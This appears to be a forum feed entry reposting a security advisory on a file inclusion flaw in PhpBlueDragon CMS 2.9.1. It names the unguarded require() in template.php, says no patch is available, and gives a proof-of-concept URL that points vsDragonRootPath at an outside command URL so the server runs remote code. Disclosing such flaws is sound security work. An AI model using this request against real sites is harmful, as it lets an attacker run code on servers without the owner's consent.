<![CDATA[Latest posts for the topic "PhpBlueDragon CMS 2.9.1, File inclusion vulnerability"]]>
/hvaonline/posts/list/13.html
JForum - http://www.jforum.netPhpBlueDragon CMS 2.9.1, File inclusion vulnerability http://phpbluedragon.net/
Patch: unavailable
-----------------------------------------------------
1) Description:
Error occured in template.php, line 23:
---
require($vsDragonRootPath."public_includes/pub_kernel/pbd_template_custom.php");
---
2) Proof of concept: Code:
http://example/[pbd_path]/software_upload/public_includes/pub_templates/vphptree/template.php?vsDragonRootPath=[cmd_url]/
(note this is with final slash (/))